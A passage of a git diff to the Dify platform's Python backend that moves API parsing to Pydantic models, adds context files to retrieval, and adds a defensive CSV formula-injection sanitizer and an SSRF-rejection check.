required=False, default="web_app", location="json") - ) + payload = CompletionMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: @@ -142,22 +155,7 @@ class CompletionStopApi(WebApiResource): class ChatApi(WebApiResource): @web_ns.doc("Create Chat Message") @web_ns.doc(description="Create a chat message for conversational applications.") - @web_ns.doc( - params={ - "inputs": {"description": "Input variables for the chat", "type": "object", "required": True}, - "query": {"description": "User query/message", "type": "string", "required": True}, - "files": {"description": "Files to be processed", "type": "array", "required": False}, - "response_mode": { - "description": "Response mode: blocking or streaming", - "type": "string", - "enum": ["blocking", "streaming"], - "required": False, - }, - "conversation_id": {"description": "Conversation UUID", "type": "string", "required": False}, - "parent_message_id": {"description": "Parent message UUID", "type": "string", "required": False}, - "retriever_from": {"description": "Source of retriever", "type": "string", "required": False}, - } - ) + @web_ns.expect(web_ns.models[ChatMessagePayload.__name__]) @web_ns.doc( responses={ 200: "Success", @@ -173,20 +171,10 @@ class ChatApi(WebApiResource): if app_mode not in {AppMode.CHAT, AppMode.AGENT_CHAT, AppMode.ADVANCED_CHAT}: raise NotChatAppError() - parser = ( - reqparse.RequestParser() - .add_argument("inputs", type=dict, required=True, location="json") - .add_argument("query", type=str, required=True, location="json") - .add_argument("files", type=list, required=False, location="json") - .add_argument("response_mode", type=str, choices=["blocking", "streaming"], location="json") - .add_argument("conversation_id", type=uuid_value, location="json") - .add_argument("parent_message_id", type=uuid_value, required=False, location="json") - .add_argument("retriever_from", type=str, required=False, default="web_app", location="json") - ) + payload = ChatMessagePayload.model_validate(web_ns.payload or {}) + args = payload.model_dump(exclude_none=True) - args = parser.parse_args() - - streaming = args["response_mode"] == "streaming" + streaming = payload.response_mode == "streaming" args["auto_generate_name"] = False try: diff --git a/api/core/app/app_config/entities.py b/api/core/app/app_config/entities.py index 93f2742599..307af3747c 100644 --- a/api/core/app/app_config/entities.py +++ b/api/core/app/app_config/entities.py @@ -1,3 +1,4 @@ +import json from collections.abc import Sequence from enum import StrEnum, auto from typing import Any, Literal @@ -120,7 +121,7 @@ class VariableEntity(BaseModel): allowed_file_types: Sequence[FileType] | None = Field(default_factory=list) allowed_file_extensions: Sequence[str] | None = Field(default_factory=list) allowed_file_upload_methods: Sequence[FileTransferMethod] | None = Field(default_factory=list) - json_schema: dict[str, Any] | None = Field(default=None) + json_schema: str | None = Field(default=None) @field_validator("description", mode="before") @classmethod @@ -134,11 +135,17 @@ class VariableEntity(BaseModel): @field_validator("json_schema") @classmethod - def validate_json_schema(cls, schema: dict[str, Any] | None) -> dict[str, Any] | None: + def validate_json_schema(cls, schema: str | None) -> str | None: if schema is None: return None + 
try: - Draft7Validator.check_schema(schema) + json_schema = json.loads(schema) + except json.JSONDecodeError: + raise ValueError(f"invalid json_schema value {schema}") + + try: + Draft7Validator.check_schema(json_schema) except SchemaError as e: raise ValueError(f"Invalid JSON schema: {e.message}") return schema diff --git a/api/core/app/apps/advanced_chat/generate_task_pipeline.py b/api/core/app/apps/advanced_chat/generate_task_pipeline.py index b297f3ff20..da1e9f19b6 100644 --- a/api/core/app/apps/advanced_chat/generate_task_pipeline.py +++ b/api/core/app/apps/advanced_chat/generate_task_pipeline.py @@ -62,8 +62,7 @@ from core.app.task_pipeline.message_cycle_manager import MessageCycleManager from core.base.tts import AppGeneratorTTSPublisher, AudioTrunk from core.model_runtime.entities.llm_entities import LLMUsage from core.model_runtime.utils.encoders import jsonable_encoder -from core.ops.entities.trace_entity import TraceTaskName -from core.ops.ops_trace_manager import TraceQueueManager, TraceTask +from core.ops.ops_trace_manager import TraceQueueManager from core.workflow.enums import WorkflowExecutionStatus from core.workflow.nodes import NodeType from core.workflow.repositories.draft_variable_repository import DraftVariableSaverFactory @@ -73,7 +72,7 @@ from extensions.ext_database import db from libs.datetime_utils import naive_utc_now from models import Account, Conversation, EndUser, Message, MessageFile from models.enums import CreatorUserRole -from models.workflow import Workflow, WorkflowNodeExecutionModel +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -581,7 +580,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): with self._database_session() as session: # Save message - self._save_message(session=session, graph_runtime_state=resolved_state, trace_manager=trace_manager) + self._save_message(session=session, graph_runtime_state=resolved_state) yield workflow_finish_resp elif event.stopped_by in ( @@ -591,7 +590,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): # When hitting input-moderation or annotation-reply, the workflow will not start with self._database_session() as session: # Save message - self._save_message(session=session, trace_manager=trace_manager) + self._save_message(session=session) yield self._message_end_to_stream_response() @@ -600,7 +599,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): event: QueueAdvancedChatMessageEndEvent, *, graph_runtime_state: GraphRuntimeState | None = None, - trace_manager: TraceQueueManager | None = None, **kwargs, ) -> Generator[StreamResponse, None, None]: """Handle advanced chat message end events.""" @@ -618,7 +616,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): # Save message with self._database_session() as session: - self._save_message(session=session, graph_runtime_state=resolved_state, trace_manager=trace_manager) + self._save_message(session=session, graph_runtime_state=resolved_state) yield self._message_end_to_stream_response() @@ -772,13 +770,7 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): if self._conversation_name_generate_thread: logger.debug("Conversation name generation running as daemon thread") - def _save_message( - self, - *, - session: Session, - graph_runtime_state: GraphRuntimeState | None = None, - trace_manager: TraceQueueManager | None = None, - ): + def _save_message(self, *, session: Session, graph_runtime_state: GraphRuntimeState | None = None): 
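+        # Persists the message, its metadata, and any message files; trace enqueueing was removed from this method.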
message = self._get_message(session=session) # If there are assistant files, remove markdown image links from answer @@ -817,14 +809,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): metadata = self._task_state.metadata.model_dump() message.message_metadata = json.dumps(jsonable_encoder(metadata)) - - # Extract model provider and model_id from workflow node executions for tracing - if message.workflow_run_id: - model_info = self._extract_model_info_from_workflow(session, message.workflow_run_id) - if model_info: - message.model_provider = model_info.get("provider") - message.model_id = model_info.get("model") - message_files = [ MessageFile( message_id=message.id, @@ -842,68 +826,6 @@ class AdvancedChatAppGenerateTaskPipeline(GraphRuntimeStateSupport): ] session.add_all(message_files) - # Trigger MESSAGE_TRACE for tracing integrations - if trace_manager: - trace_manager.add_trace_task( - TraceTask( - TraceTaskName.MESSAGE_TRACE, conversation_id=self._conversation_id, message_id=self._message_id - ) - ) - - def _extract_model_info_from_workflow(self, session: Session, workflow_run_id: str) -> dict[str, str] | None: - """ - Extract model provider and model_id from workflow node executions. - Returns dict with 'provider' and 'model' keys, or None if not found. - """ - try: - # Query workflow node executions for LLM or Agent nodes - stmt = ( - select(WorkflowNodeExecutionModel) - .where(WorkflowNodeExecutionModel.workflow_run_id == workflow_run_id) - .where(WorkflowNodeExecutionModel.node_type.in_(["llm", "agent"])) - .order_by(WorkflowNodeExecutionModel.created_at.desc()) - .limit(1) - ) - node_execution = session.scalar(stmt) - - if not node_execution: - return None - - # Try to extract from execution_metadata for agent nodes - if node_execution.execution_metadata: - try: - metadata = json.loads(node_execution.execution_metadata) - agent_log = metadata.get("agent_log", []) - # Look for the first agent thought with provider info - for log_entry in agent_log: - entry_metadata = log_entry.get("metadata", {}) - provider_str = entry_metadata.get("provider") - if provider_str: - # Parse format like "langgenius/deepseek/deepseek" - parts = provider_str.split("/") - if len(parts) >= 3: - return {"provider": parts[1], "model": parts[2]} - elif len(parts) == 2: - return {"provider": parts[0], "model": parts[1]} - except (json.JSONDecodeError, KeyError, AttributeError) as e: - logger.debug("Failed to parse execution_metadata: %s", e) - - # Try to extract from process_data for llm nodes - if node_execution.process_data: - try: - process_data = json.loads(node_execution.process_data) - provider = process_data.get("model_provider") - model = process_data.get("model_name") - if provider and model: - return {"provider": provider, "model": model} - except (json.JSONDecodeError, KeyError) as e: - logger.debug("Failed to parse process_data: %s", e) - - return None - except Exception as e: - logger.warning("Failed to extract model info from workflow: %s", e) - return None - def _seed_graph_runtime_state_from_queue_manager(self) -> None: """Bootstrap the cached runtime state from the queue manager when present.""" candidate = self._base_task_pipeline.queue_manager.graph_runtime_state diff --git a/api/core/app/apps/base_app_generator.py b/api/core/app/apps/base_app_generator.py index 1b0474142e..02d58a07d1 100644 --- a/api/core/app/apps/base_app_generator.py +++ b/api/core/app/apps/base_app_generator.py @@ -1,3 +1,4 @@ +import json from collections.abc import Generator, Mapping, Sequence 
from typing import TYPE_CHECKING, Any, Union, final @@ -175,6 +176,13 @@ class BaseAppGenerator: value = True elif value == 0: value = False + case VariableEntityType.JSON_OBJECT: + if not isinstance(value, str): + raise ValueError(f"{variable_entity.variable} in input form must be a string") + try: + json.loads(value) + except json.JSONDecodeError: + raise ValueError(f"{variable_entity.variable} in input form must be a valid JSON object") case _: raise AssertionError("this statement should be unreachable.") diff --git a/api/core/app/apps/base_app_runner.py b/api/core/app/apps/base_app_runner.py index 9a9832dd4a..e2e6c11480 100644 --- a/api/core/app/apps/base_app_runner.py +++ b/api/core/app/apps/base_app_runner.py @@ -83,6 +83,7 @@ class AppRunner: context: str | None = None, memory: TokenBufferMemory | None = None, image_detail_config: ImagePromptMessageContent.DETAIL | None = None, + context_files: list["File"] | None = None, ) -> tuple[list[PromptMessage], list[str] | None]: """ Organize prompt messages @@ -111,6 +112,7 @@ class AppRunner: memory=memory, model_config=model_config, image_detail_config=image_detail_config, + context_files=context_files, ) else: memory_config = MemoryConfig(window=MemoryConfig.WindowConfig(enabled=False)) diff --git a/api/core/app/apps/chat/app_runner.py b/api/core/app/apps/chat/app_runner.py index 53188cf506..f8338b226b 100644 --- a/api/core/app/apps/chat/app_runner.py +++ b/api/core/app/apps/chat/app_runner.py @@ -11,6 +11,7 @@ from core.app.entities.app_invoke_entities import ( ) from core.app.entities.queue_entities import QueueAnnotationReplyEvent from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler +from core.file import File from core.memory.token_buffer_memory import TokenBufferMemory from core.model_manager import ModelInstance from core.model_runtime.entities.message_entities import ImagePromptMessageContent @@ -146,6 +147,7 @@ class ChatAppRunner(AppRunner): # get context from datasets context = None + context_files: list[File] = [] if app_config.dataset and app_config.dataset.dataset_ids: hit_callback = DatasetIndexToolCallbackHandler( queue_manager, @@ -156,7 +158,7 @@ class ChatAppRunner(AppRunner): ) dataset_retrieval = DatasetRetrieval(application_generate_entity) - context = dataset_retrieval.retrieve( + context, retrieved_files = dataset_retrieval.retrieve( app_id=app_record.id, user_id=application_generate_entity.user_id, tenant_id=app_record.tenant_id, @@ -171,7 +173,11 @@ class ChatAppRunner(AppRunner): memory=memory, message_id=message.id, inputs=inputs, + vision_enabled=application_generate_entity.app_config.app_model_config_dict.get("file_upload", {}).get( + "enabled", False + ), ) + context_files = retrieved_files or [] # reorganize all inputs and template to prompt messages # Include: prompt template, inputs, query(optional), files(optional) @@ -186,6 +192,7 @@ class ChatAppRunner(AppRunner): context=context, memory=memory, image_detail_config=image_detail_config, + context_files=context_files, ) # check hosting moderation diff --git a/api/core/app/apps/completion/app_runner.py b/api/core/app/apps/completion/app_runner.py index e2be4146e1..ddfb5725b4 100644 --- a/api/core/app/apps/completion/app_runner.py +++ b/api/core/app/apps/completion/app_runner.py @@ -10,6 +10,7 @@ from core.app.entities.app_invoke_entities import ( CompletionAppGenerateEntity, ) from core.callback_handler.index_tool_callback_handler import DatasetIndexToolCallbackHandler +from core.file import File from 
core.model_manager import ModelInstance from core.model_runtime.entities.message_entities import ImagePromptMessageContent from core.moderation.base import ModerationError @@ -102,6 +103,7 @@ class CompletionAppRunner(AppRunner): # get context from datasets context = None + context_files: list[File] = [] if app_config.dataset and app_config.dataset.dataset_ids: hit_callback = DatasetIndexToolCallbackHandler( queue_manager, @@ -116,7 +118,7 @@ class CompletionAppRunner(AppRunner): query = inputs.get(dataset_config.retrieve_config.query_variable, "") dataset_retrieval = DatasetRetrieval(application_generate_entity) - context = dataset_retrieval.retrieve( + context, retrieved_files = dataset_retrieval.retrieve( app_id=app_record.id, user_id=application_generate_entity.user_id, tenant_id=app_record.tenant_id, @@ -130,7 +132,11 @@ class CompletionAppRunner(AppRunner): hit_callback=hit_callback, message_id=message.id, inputs=inputs, + vision_enabled=application_generate_entity.app_config.app_model_config_dict.get("file_upload", {}).get( + "enabled", False + ), ) + context_files = retrieved_files or [] # reorganize all inputs and template to prompt messages # Include: prompt template, inputs, query(optional), files(optional) @@ -144,6 +150,7 @@ class CompletionAppRunner(AppRunner): query=query, context=context, image_detail_config=image_detail_config, + context_files=context_files, ) # check hosting moderation diff --git a/api/core/app/entities/task_entities.py b/api/core/app/entities/task_entities.py index 7692128985..79a5e657b3 100644 --- a/api/core/app/entities/task_entities.py +++ b/api/core/app/entities/task_entities.py @@ -40,9 +40,6 @@ class EasyUITaskState(TaskState): """ llm_result: LLMResult - first_token_time: float | None = None - last_token_time: float | None = None - is_streaming_response: bool = False class WorkflowTaskState(TaskState): diff --git a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py index 98548ddfbb..5bb93fa44a 100644 --- a/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py +++ b/api/core/app/task_pipeline/easy_ui_based_generate_task_pipeline.py @@ -332,12 +332,6 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): if not self._task_state.llm_result.prompt_messages: self._task_state.llm_result.prompt_messages = chunk.prompt_messages - # Track streaming response times - if self._task_state.first_token_time is None: - self._task_state.first_token_time = time.perf_counter() - self._task_state.is_streaming_response = True - self._task_state.last_token_time = time.perf_counter() - # handle output moderation chunk should_direct_answer = self._handle_output_moderation_chunk(cast(str, delta_text)) if should_direct_answer: @@ -348,9 +342,11 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): self._task_state.llm_result.message.content = current_content if isinstance(event, QueueLLMChunkEvent): + event_type = self._message_cycle_manager.get_message_event_type(message_id=self._message_id) yield self._message_cycle_manager.message_to_stream_response( answer=cast(str, delta_text), message_id=self._message_id, + event_type=event_type, ) else: yield self._agent_message_to_stream_response( @@ -404,18 +400,6 @@ class EasyUIBasedGenerateTaskPipeline(BasedGenerateTaskPipeline): message.total_price = usage.total_price message.currency = usage.currency self._task_state.llm_result.usage.latency = message.provider_response_latency - - # Add streaming 
metrics to usage if available - if self._task_state.is_streaming_response and self._task_state.first_token_time: - start_time = self.start_at - first_token_time = self._task_state.first_token_time - last_token_time = self._task_state.last_token_time or first_token_time - usage.time_to_first_token = round(first_token_time - start_time, 3) - usage.time_to_generate = round(last_token_time - first_token_time, 3) - - # Update metadata with the complete usage info - self._task_state.metadata.usage = usage - message.message_metadata = self._task_state.metadata.model_dump_json() if trace_manager: diff --git a/api/core/app/task_pipeline/message_cycle_manager.py b/api/core/app/task_pipeline/message_cycle_manager.py index 2e6f92efa5..0e7f300cee 100644 --- a/api/core/app/task_pipeline/message_cycle_manager.py +++ b/api/core/app/task_pipeline/message_cycle_manager.py @@ -5,7 +5,7 @@ from threading import Thread from typing import Union from flask import Flask, current_app -from sqlalchemy import select +from sqlalchemy import exists, select from sqlalchemy.orm import Session from configs import dify_config @@ -54,6 +54,20 @@ class MessageCycleManager: ): self._application_generate_entity = application_generate_entity self._task_state = task_state + self._message_has_file: set[str] = set() + + def get_message_event_type(self, message_id: str) -> StreamEvent: + if message_id in self._message_has_file: + return StreamEvent.MESSAGE_FILE + + with Session(db.engine, expire_on_commit=False) as session: + has_file = session.query(exists().where(MessageFile.message_id == message_id)).scalar() + + if has_file: + self._message_has_file.add(message_id) + return StreamEvent.MESSAGE_FILE + + return StreamEvent.MESSAGE def generate_conversation_name(self, *, conversation_id: str, query: str) -> Thread | None: """ @@ -214,7 +228,11 @@ class MessageCycleManager: return None def message_to_stream_response( - self, answer: str, message_id: str, from_variable_selector: list[str] | None = None + self, + answer: str, + message_id: str, + from_variable_selector: list[str] | None = None, + event_type: StreamEvent | None = None, ) -> MessageStreamResponse: """ Message to stream response. 
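The hunk above lets callers pass the resolved event type in, and the hunk below removes the per-chunk `MessageFile` query this method used to run; callers now go through `get_message_event_type`, which memoizes positive results so later chunks skip the database entirely. A minimal sketch of that pattern, using hypothetical stand-in names rather than the real Dify classes:

```python
from collections.abc import Callable


class EventTypeResolver:
    """Sketch of a memoized has-file check (illustrative names only)."""

    def __init__(self, has_file_in_db: Callable[[str], bool]) -> None:
        self._has_file_in_db = has_file_in_db  # stand-in for the exists() DB query
        self._message_has_file: set[str] = set()  # caches positive results only

    def resolve(self, message_id: str) -> str:
        if message_id in self._message_has_file:
            return "message_file"  # cached: no DB round-trip on later chunks
        if self._has_file_in_db(message_id):
            self._message_has_file.add(message_id)
            return "message_file"
        # Misses are re-checked on the next call, so a file attached mid-stream still surfaces.
        return "message"
```

Caching only positives is the safe direction here: a negative result can go stale the moment a file is attached to the message, while a positive never does.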
@@ -222,16 +240,12 @@ class MessageCycleManager: :param message_id: message id :return: """ - with Session(db.engine, expire_on_commit=False) as session: - message_file = session.scalar(select(MessageFile).where(MessageFile.id == message_id)) - event_type = StreamEvent.MESSAGE_FILE if message_file else StreamEvent.MESSAGE - return MessageStreamResponse( task_id=self._application_generate_entity.task_id, id=message_id, answer=answer, from_variable_selector=from_variable_selector, - event=event_type, + event=event_type or StreamEvent.MESSAGE, ) def message_replace_to_stream_response(self, answer: str, reason: str = "") -> MessageReplaceStreamResponse: diff --git a/api/core/callback_handler/index_tool_callback_handler.py b/api/core/callback_handler/index_tool_callback_handler.py index 14d5f38dcd..d0279349ca 100644 --- a/api/core/callback_handler/index_tool_callback_handler.py +++ b/api/core/callback_handler/index_tool_callback_handler.py @@ -7,7 +7,7 @@ from core.app.apps.base_app_queue_manager import AppQueueManager, PublishFrom from core.app.entities.app_invoke_entities import InvokeFrom from core.app.entities.queue_entities import QueueRetrieverResourcesEvent from core.rag.entities.citation_metadata import RetrievalSourceMetadata -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.models.document import Document from extensions.ext_database import db from models.dataset import ChildChunk, DatasetQuery, DocumentSegment @@ -59,7 +59,7 @@ class DatasetIndexToolCallbackHandler: document_id, ) continue - if dataset_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if dataset_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunk_stmt = select(ChildChunk).where( ChildChunk.index_node_id == document.metadata["doc_id"], ChildChunk.dataset_id == dataset_document.dataset_id, diff --git a/sdks/python-client/tests/__init__.py b/api/core/db/__init__.py similarity index 100% rename from sdks/python-client/tests/__init__.py rename to api/core/db/__init__.py diff --git a/api/core/db/session_factory.py b/api/core/db/session_factory.py new file mode 100644 index 0000000000..1dae2eafd4 --- /dev/null +++ b/api/core/db/session_factory.py @@ -0,0 +1,38 @@ +from sqlalchemy import Engine +from sqlalchemy.orm import Session, sessionmaker + +_session_maker: sessionmaker | None = None + + +def configure_session_factory(engine: Engine, expire_on_commit: bool = False): + """Configure the global session factory""" + global _session_maker + _session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit) + + +def get_session_maker() -> sessionmaker: + if _session_maker is None: + raise RuntimeError("Session factory not configured. 
Call configure_session_factory() first.") + return _session_maker + + +def create_session() -> Session: + return get_session_maker()() + + +# Class wrapper for convenience +class SessionFactory: + @staticmethod + def configure(engine: Engine, expire_on_commit: bool = False): + configure_session_factory(engine, expire_on_commit) + + @staticmethod + def get_session_maker() -> sessionmaker: + return get_session_maker() + + @staticmethod + def create_session() -> Session: + return create_session() + + +session_factory = SessionFactory() diff --git a/api/core/entities/knowledge_entities.py b/api/core/entities/knowledge_entities.py index b9ca7414dc..d4093b5245 100644 --- a/api/core/entities/knowledge_entities.py +++ b/api/core/entities/knowledge_entities.py @@ -1,4 +1,4 @@ -from pydantic import BaseModel +from pydantic import BaseModel, Field, field_validator class PreviewDetail(BaseModel): @@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel): class PipelineDataset(BaseModel): id: str name: str - description: str + description: str = Field(default="", description="knowledge dataset description") chunk_structure: str + @field_validator("description", mode="before") + @classmethod + def normalize_description(cls, value: str | None) -> str: + """Coerce None to empty string so description is always a string.""" + if value is None: + return "" + return value + class PipelineDocument(BaseModel): id: str diff --git a/api/core/entities/mcp_provider.py b/api/core/entities/mcp_provider.py index 7484cea04a..7fdf5e4be6 100644 --- a/api/core/entities/mcp_provider.py +++ b/api/core/entities/mcp_provider.py @@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel): return None def retrieve_tokens(self) -> OAuthTokens | None: - """OAuth tokens if available""" + """Retrieve OAuth tokens if authentication is complete. + + Returns: + OAuthTokens if the provider has been authenticated, None otherwise. + """ if not self.credentials: return None credentials = self.decrypt_credentials() + access_token = credentials.get("access_token", "") + # Return None if access_token is empty to avoid generating invalid "Authorization: Bearer " header. + # Note: We don't check for whitespace-only strings here because: + # 1. OAuth servers don't return whitespace-only access tokens in practice + # 2. Even if they did, the server would return 401, triggering the OAuth flow correctly + if not access_token: + return None return OAuthTokens( - access_token=credentials.get("access_token", ""), + access_token=access_token, token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE), expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN), refresh_token=credentials.get("refresh_token", ""), diff --git a/api/core/helper/csv_sanitizer.py b/api/core/helper/csv_sanitizer.py new file mode 100644 index 0000000000..0023de5a35 --- /dev/null +++ b/api/core/helper/csv_sanitizer.py @@ -0,0 +1,89 @@ +"""CSV sanitization utilities to prevent formula injection attacks.""" + +from typing import Any + + +class CSVSanitizer: + """ + Sanitizer for CSV export to prevent formula injection attacks. + + This class provides methods to sanitize data before CSV export by escaping + characters that could be interpreted as formulas by spreadsheet applications + (Excel, LibreOffice, Google Sheets). + + Formula injection occurs when user-controlled data starting with special + characters (=, +, -, @, tab, carriage return) is exported to CSV and opened + in a spreadsheet application, potentially executing malicious commands. 
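+
+    A small illustration of the escaping rule (hypothetical values):
+
+        >>> CSVSanitizer.sanitize_value("-2+3")
+        "'-2+3"
+        >>> CSVSanitizer.sanitize_value("plain text")
+        'plain text'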
+ """ + + # Characters that can start a formula in Excel/LibreOffice/Google Sheets + FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"}) + + @classmethod + def sanitize_value(cls, value: Any) -> str: + """ + Sanitize a value for safe CSV export. + + Prefixes formula-initiating characters with a single quote to prevent + Excel/LibreOffice/Google Sheets from treating them as formulas. + + Args: + value: The value to sanitize (will be converted to string) + + Returns: + Sanitized string safe for CSV export + + Examples: + >>> CSVSanitizer.sanitize_value("=1+1") + "'=1+1" + >>> CSVSanitizer.sanitize_value("Hello World") + "Hello World" + >>> CSVSanitizer.sanitize_value(None) + "" + """ + if value is None: + return "" + + # Convert to string + str_value = str(value) + + # If empty, return as is + if not str_value: + return "" + + # Check if first character is a formula initiator + if str_value[0] in cls.FORMULA_CHARS: + # Prefix with single quote to escape + return f"'{str_value}" + + return str_value + + @classmethod + def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]: + """ + Sanitize specified fields in a dictionary. + + Args: + data: Dictionary containing data to sanitize + fields_to_sanitize: List of field names to sanitize. + If None, sanitizes all string fields. + + Returns: + Dictionary with sanitized values (creates a shallow copy) + + Examples: + >>> data = {"question": "=1+1", "answer": "+calc", "id": "123"} + >>> CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + {"question": "'=1+1", "answer": "'+calc", "id": "123"} + """ + sanitized = data.copy() + + if fields_to_sanitize is None: + # Sanitize all string fields + fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)] + + for field in fields_to_sanitize: + if field in sanitized: + sanitized[field] = cls.sanitize_value(sanitized[field]) + + return sanitized diff --git a/api/core/helper/ssrf_proxy.py b/api/core/helper/ssrf_proxy.py index 0de026f3c7..6c98aea1be 100644 --- a/api/core/helper/ssrf_proxy.py +++ b/api/core/helper/ssrf_proxy.py @@ -9,6 +9,7 @@ import httpx from configs import dify_config from core.helper.http_client_pooling import get_pooled_http_client +from core.tools.errors import ToolSSRFError logger = logging.getLogger(__name__) @@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs): while retries <= max_retries: try: response = client.request(method=method, url=url, **kwargs) + # Check for SSRF protection by Squid proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. 
" + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/indexing_runner.py b/api/core/indexing_runner.py index 36b38b7b45..59de4f403d 100644 --- a/api/core/indexing_runner.py +++ b/api/core/indexing_runner.py @@ -7,7 +7,7 @@ import time import uuid from typing import Any -from flask import current_app +from flask import Flask, current_app from sqlalchemy import select from sqlalchemy.orm.exc import ObjectDeletedError @@ -21,7 +21,7 @@ from core.rag.datasource.keyword.keyword_factory import Keyword from core.rag.docstore.dataset_docstore import DatasetDocumentStore from core.rag.extractor.entity.datasource_type import DatasourceType from core.rag.extractor.entity.extract_setting import ExtractSetting, NotionInfo, WebsiteInfo -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from core.rag.index_processor.index_processor_base import BaseIndexProcessor from core.rag.index_processor.index_processor_factory import IndexProcessorFactory from core.rag.models.document import ChildDocument, Document @@ -36,6 +36,7 @@ from extensions.ext_redis import redis_client from extensions.ext_storage import storage from libs import helper from libs.datetime_utils import naive_utc_now +from models import Account from models.dataset import ChildChunk, Dataset, DatasetProcessRule, DocumentSegment from models.dataset import Document as DatasetDocument from models.model import UploadFile @@ -89,8 +90,17 @@ class IndexingRunner: text_docs = self._extract(index_processor, requeried_document, processing_rule.to_dict()) # transform + current_user = db.session.query(Account).filter_by(id=requeried_document.created_by).first() + if not current_user: + raise ValueError("no current user found") + current_user.set_tenant_id(dataset.tenant_id) documents = self._transform( - index_processor, dataset, text_docs, requeried_document.doc_language, processing_rule.to_dict() + index_processor, + dataset, + text_docs, + requeried_document.doc_language, + processing_rule.to_dict(), + current_user=current_user, ) # save segment self._load_segments(dataset, requeried_document, documents) @@ -136,7 +146,7 @@ class IndexingRunner: for document_segment in document_segments: db.session.delete(document_segment) - if requeried_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if requeried_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: # delete child chunks db.session.query(ChildChunk).where(ChildChunk.segment_id == document_segment.id).delete() db.session.commit() @@ -152,8 +162,17 @@ class IndexingRunner: text_docs = self._extract(index_processor, requeried_document, processing_rule.to_dict()) # transform + current_user = db.session.query(Account).filter_by(id=requeried_document.created_by).first() + if not current_user: + raise ValueError("no current user found") + current_user.set_tenant_id(dataset.tenant_id) documents = self._transform( - index_processor, dataset, text_docs, requeried_document.doc_language, processing_rule.to_dict() + index_processor, + dataset, + text_docs, + requeried_document.doc_language, + processing_rule.to_dict(), + current_user=current_user, ) # save segment self._load_segments(dataset, requeried_document, documents) @@ -209,7 +228,7 @@ class IndexingRunner: "dataset_id": document_segment.dataset_id, }, ) - if requeried_document.doc_form == IndexType.PARENT_CHILD_INDEX: + if requeried_document.doc_form == IndexStructureType.PARENT_CHILD_INDEX: child_chunks = 
document_segment.get_child_chunks() if child_chunks: child_documents = [] @@ -302,6 +321,7 @@ class IndexingRunner: text_docs = index_processor.extract(extract_setting, process_rule_mode=tmp_processing_rule["mode"]) documents = index_processor.transform( text_docs, + current_user=None, embedding_model_instance=embedding_model_instance, process_rule=processing_rule.to_dict(), tenant_id=tenant_id, @@ -551,7 +571,10 @@ class IndexingRunner: indexing_start_at = time.perf_counter() tokens = 0 create_keyword_thread = None - if dataset_document.doc_form != IndexType.PARENT_CHILD_INDEX and dataset.indexing_technique == "economy": + if ( + dataset_document.doc_form != IndexStructureType.PARENT_CHILD_INDEX + and dataset.indexing_technique == "economy" + ): # create keyword index create_keyword_thread = threading.Thread( target=self._process_keyword_index, @@ -590,7 +613,7 @@ class IndexingRunner: for future in futures: tokens += future.result() if ( - dataset_document.doc_form != IndexType.PARENT_CHILD_INDEX + dataset_document.doc_form != IndexStructureType.PARENT_CHILD_INDEX and dataset.indexing_technique == "economy" and create_keyword_thread is not None ): @@ -635,7 +658,13 @@ class IndexingRunner: db.session.commit() def _process_chunk( - self, flask_app, index_processor, chunk_documents, dataset, dataset_document, embedding_model_instance + self, + flask_app: Flask, + index_processor: BaseIndexProcessor, + chunk_documents: list[Document], + dataset: Dataset, + dataset_document: DatasetDocument, + embedding_model_instance: ModelInstance | None, ): with flask_app.app_context(): # check document is paused @@ -646,8 +675,15 @@ class IndexingRunner: page_content_list = [document.page_content for document in chunk_documents] tokens += sum(embedding_model_instance.get_text_embedding_num_tokens(page_content_list)) + multimodal_documents = [] + for document in chunk_documents: + if document.attachments and dataset.is_multimodal: + multimodal_documents.extend(document.attachments) + # load index - index_processor.load(dataset, chunk_documents, with_keywords=False) + index_processor.load( + dataset, chunk_documents, multimodal_documents=multimodal_documents, with_keywords=False + ) document_ids = [document.metadata["doc_id"] for document in chunk_documents] db.session.query(DocumentSegment).where( @@ -710,6 +746,7 @@ class IndexingRunner: text_docs: list[Document], doc_language: str, process_rule: dict, + current_user: Account | None = None, ) -> list[Document]: # get embedding model instance 